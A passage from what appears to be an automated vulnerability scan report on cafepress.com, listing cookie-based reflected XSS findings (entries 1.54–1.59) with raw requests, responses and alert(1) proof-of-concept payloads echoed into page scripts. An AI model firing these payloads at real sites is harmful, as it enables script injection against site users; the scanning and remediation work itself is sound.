HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 60125 Date: Sun, 26 Dec 2010 13:47:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60125 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '6774f</script><script>alert(1)</script>147c0c0a55c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.54. http://www.cafepress.com/+ornaments [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ornaments
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40a17"-alert(1)-"1b71678a13 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59006 Date: Sun, 26 Dec 2010 13:49:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59006 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.55. http://www.cafepress.com/+ornaments [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ornaments
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65868</script><script>alert(1)</script>67d717b073a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=65868</script><script>alert(1)</script>67d717b073a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 59029 Date: Sun, 26 Dec 2010 13:49:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59029 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '65868</script><script>alert(1)</script>67d717b073a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.56. http://www.cafepress.com/+posters [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+posters
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ddf8"-alert(1)-"05b70d2df26 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 65624 Date: Sun, 26 Dec 2010 13:47:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65624 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.57. http://www.cafepress.com/+posters [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+posters
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c66</script><script>alert(1)</script>78957873d50 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c0c66</script><script>alert(1)</script>78957873d50 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 65646 Date: Sun, 26 Dec 2010 13:47:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'c0c66</script><script>alert(1)</script>78957873d50 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stadium-blanket
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a90"-alert(1)-"b637a8bd2b7 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59457 Date: Sun, 26 Dec 2010 13:49:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59457 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stadium-blanket
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71ca1</script><script>alert(1)</script>6e6e4d328ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
